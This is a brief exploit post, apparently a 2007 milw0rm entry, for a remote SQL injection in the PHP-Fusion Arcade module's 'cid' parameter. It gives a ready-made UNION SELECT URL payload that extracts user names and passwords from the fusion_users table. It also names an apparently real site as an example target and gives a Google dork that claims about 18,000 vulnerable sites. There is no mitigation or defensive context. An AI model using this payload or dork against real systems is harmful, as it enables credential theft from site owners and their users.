-------------------------------- PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* -------------------------------- Exapmle: http://www.basicwallpapers.dk/infusions/arcade/ -------------------------------- Google Dork: /infusions/arcade/ 18.000 sites:) -------------------------------- Ekin0x / --> evilc0der.org <-- -------------------------------- # milw0rm.com [2007-04-02]